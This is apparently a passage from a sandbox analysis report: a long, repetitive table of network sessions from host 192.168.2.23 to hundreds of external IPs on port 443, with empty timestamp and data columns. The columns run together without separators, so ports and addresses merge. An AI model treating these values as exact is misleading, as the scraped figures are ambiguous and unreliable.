                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25512192.168.2.2346874101.133.146.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25513192.168.2.234470461.164.105.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25514192.168.2.2339914181.255.87.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25515192.168.2.236043812.142.106.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25516192.168.2.235662697.225.95.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25517192.168.2.235446447.198.110.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25518192.168.2.234832486.224.199.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25519192.168.2.2354568184.41.217.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25520192.168.2.2360972152.131.0.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25521192.168.2.2346918141.117.235.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25522192.168.2.233586254.124.88.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25523192.168.2.235101264.183.223.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25524192.168.2.235054435.134.143.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25525192.168.2.235181472.93.65.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25526192.168.2.2346834221.253.64.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25527192.168.2.2359296140.2.40.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25528192.168.2.2358226115.239.96.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25529192.168.2.2360178171.57.112.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25530192.168.2.234209843.129.182.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25531192.168.2.23414902.168.55.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25532192.168.2.234741818.212.172.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25533192.168.2.2334036162.139.138.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25534192.168.2.2343874148.100.181.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25535192.168.2.2352958135.200.244.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25536192.168.2.235299091.10.102.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25537192.168.2.2339408112.76.189.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25538192.168.2.235018898.52.85.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25539192.168.2.2358400146.20.242.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25540192.168.2.235866257.46.52.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25541192.168.2.2351804203.55.225.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25542192.168.2.2355102171.35.9.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25543192.168.2.235045091.224.181.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25544192.168.2.233385041.60.13.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25545192.168.2.2354598222.54.20.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25546192.168.2.2359198189.181.82.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25547192.168.2.2347972150.3.82.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25548192.168.2.2347368193.86.135.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25549192.168.2.2335658158.179.243.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25550192.168.2.2346454196.174.57.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25551192.168.2.2353460181.46.226.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25552192.168.2.2334296110.7.10.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25553192.168.2.2350784151.210.132.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25554192.168.2.2344822208.233.251.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25555192.168.2.233701234.79.228.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25556192.168.2.2349828152.1.227.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25557192.168.2.2351282149.107.201.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25558192.168.2.2345292188.34.29.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25559192.168.2.235432691.129.154.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25560192.168.2.2359728116.105.237.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25561192.168.2.2358380203.125.135.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25562192.168.2.2348118146.234.65.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25563192.168.2.235984690.7.232.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25564192.168.2.2354712159.52.210.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25565192.168.2.2350358156.114.119.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25566192.168.2.2342730151.233.205.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25567192.168.2.2343678153.229.58.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25568192.168.2.234626431.238.140.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25569192.168.2.234883858.209.65.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25570192.168.2.2358486142.182.110.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25571192.168.2.2334370105.158.113.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25572192.168.2.235766491.155.241.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25573192.168.2.2340690155.253.253.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25574192.168.2.234897425.218.201.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25575192.168.2.235099017.127.50.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25576192.168.2.2338758100.195.148.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25577192.168.2.233313436.26.203.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25578192.168.2.2340198100.222.1.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25579192.168.2.2341564155.62.112.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25580192.168.2.2342498218.200.102.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25581192.168.2.235633031.87.231.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25582192.168.2.2349666139.76.26.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25583192.168.2.234887490.48.83.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25584192.168.2.2333438201.28.83.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25585192.168.2.233587898.45.83.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25586192.168.2.233723841.208.140.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25587192.168.2.234141878.122.225.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25588192.168.2.2359336149.191.146.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25589192.168.2.2347824152.43.66.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25590192.168.2.233563623.178.93.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25591192.168.2.235859885.141.249.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25592192.168.2.2350996153.3.85.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25593192.168.2.2348510206.229.93.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25594192.168.2.2339020104.221.147.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25595192.168.2.2353386186.13.106.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25596192.168.2.2336972120.124.104.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25597192.168.2.235678020.2.51.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25598192.168.2.2333302201.10.182.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25599192.168.2.2337466109.223.174.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25600192.168.2.2334716130.103.161.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25601192.168.2.234386652.223.229.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25602192.168.2.2343696177.9.242.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25603192.168.2.234647278.24.225.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25604192.168.2.234237067.109.166.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25605192.168.2.2348190128.253.87.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25606192.168.2.2343942130.36.80.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25607192.168.2.2346542101.206.149.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25608192.168.2.2344990114.2.125.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25609192.168.2.2347884210.5.77.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25610192.168.2.23414848.65.136.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25611192.168.2.235506861.110.13.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25612192.168.2.2356116199.128.219.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25613192.168.2.2356378104.133.164.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25614192.168.2.234984681.218.171.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25615192.168.2.233298295.190.49.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25616192.168.2.235377036.223.180.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25617192.168.2.2334190207.1.141.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25618192.168.2.2346290191.102.49.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25619192.168.2.2341072202.200.69.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25620192.168.2.235114470.159.96.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25621192.168.2.234962892.153.176.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25622192.168.2.2358674129.46.116.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25623192.168.2.2336834209.66.247.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25624192.168.2.235856665.9.249.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25625192.168.2.2348356112.195.190.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25626192.168.2.2359768162.16.227.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25627192.168.2.2348934184.210.188.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25628192.168.2.2343906203.58.155.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25629192.168.2.2356584223.132.133.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25630192.168.2.2335018137.219.61.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25631192.168.2.2335882180.237.220.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25632192.168.2.234217848.106.152.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25633192.168.2.2355582160.176.31.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25634192.168.2.233791244.8.216.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25635192.168.2.2346954203.193.51.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25636192.168.2.2354540203.1.251.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25637192.168.2.2338164138.74.20.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25638192.168.2.2359580128.217.138.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25639192.168.2.234220498.43.199.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25640192.168.2.2350548201.45.240.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25641192.168.2.2351958188.59.189.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25642192.168.2.2342052140.101.88.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25643192.168.2.235287057.32.243.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25644192.168.2.2346324104.172.17.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25645192.168.2.233577618.28.172.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25646192.168.2.2336204113.181.33.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25647192.168.2.2342126122.116.3.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25648192.168.2.234904624.119.93.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25649192.168.2.235572487.244.81.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25650192.168.2.2344674217.102.12.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25651192.168.2.234566418.82.149.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25652192.168.2.234053012.202.106.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25653192.168.2.234301872.99.48.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25654192.168.2.23355785.174.174.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25655192.168.2.235400819.119.182.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25656192.168.2.234701019.211.63.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25657192.168.2.235343090.149.250.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25658192.168.2.235002631.249.82.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25659192.168.2.2339240162.241.38.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25660192.168.2.2333540195.71.166.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25661192.168.2.2359354192.192.247.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25662192.168.2.234332270.96.78.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25663192.168.2.2343522133.80.40.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25664192.168.2.233587895.5.81.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25665192.168.2.23428309.72.85.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25666192.168.2.2349556183.84.41.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25667192.168.2.23606968.46.92.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25668192.168.2.2359894177.110.46.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25669192.168.2.2353416220.17.204.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25670192.168.2.2354556114.217.10.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25671192.168.2.2342770211.53.119.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25672192.168.2.2334602109.146.145.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25673192.168.2.235353085.163.38.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25674192.168.2.2333752210.182.89.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25675192.168.2.2357588128.253.247.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25676192.168.2.233867632.239.42.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25677192.168.2.2358968154.56.80.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25678192.168.2.2354432160.31.160.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25679192.168.2.234941686.226.243.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25680192.168.2.234552095.170.226.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25681192.168.2.2332814144.141.163.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25682192.168.2.2344212166.36.85.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25683192.168.2.234461843.63.227.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25684192.168.2.2357488191.163.50.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25685192.168.2.2350842190.247.191.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25686192.168.2.234674018.198.204.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25687192.168.2.2355590126.220.174.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25688192.168.2.235928052.128.139.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25689192.168.2.235980819.40.243.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25690192.168.2.2339004155.63.100.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25691192.168.2.235924212.216.215.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25692192.168.2.2344096104.176.86.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25693192.168.2.2341310203.89.0.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25694192.168.2.235172889.155.160.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25695192.168.2.233866244.35.141.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25696192.168.2.2342710186.218.29.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25697192.168.2.2344500184.74.223.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25698192.168.2.2350626139.163.8.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25699192.168.2.2336164140.20.97.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25700192.168.2.2358116173.221.180.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25701192.168.2.2352250209.38.106.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25702192.168.2.2358966218.191.83.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25703192.168.2.233614650.41.163.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25704192.168.2.234223481.57.162.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25705192.168.2.2358956164.211.170.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25706192.168.2.233307447.114.89.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25707192.168.2.234936825.213.79.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25708192.168.2.233556646.95.16.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25709192.168.2.2337748110.154.33.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25710192.168.2.2360208205.180.128.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25711192.168.2.233804058.219.25.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25712192.168.2.2351022185.45.237.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25713192.168.2.2336974200.80.202.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25714192.168.2.233852037.138.115.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25715192.168.2.2341242203.98.71.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25716192.168.2.236040641.129.198.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25717192.168.2.233846246.182.169.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25718192.168.2.2360872170.204.71.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25719192.168.2.234826052.246.74.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25720192.168.2.2354240109.214.131.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25721192.168.2.2333402152.12.112.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25722192.168.2.235321218.213.39.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25723192.168.2.2344530180.36.238.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25724192.168.2.2349714219.47.139.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25725192.168.2.234576257.98.114.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25726192.168.2.233319071.73.151.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25727192.168.2.234929824.2.172.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25728192.168.2.2346218161.24.150.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25729192.168.2.2337622157.18.52.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25730192.168.2.2339904193.194.110.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25731192.168.2.2335440168.119.234.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          25732192.168.2.234921475.118.117.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
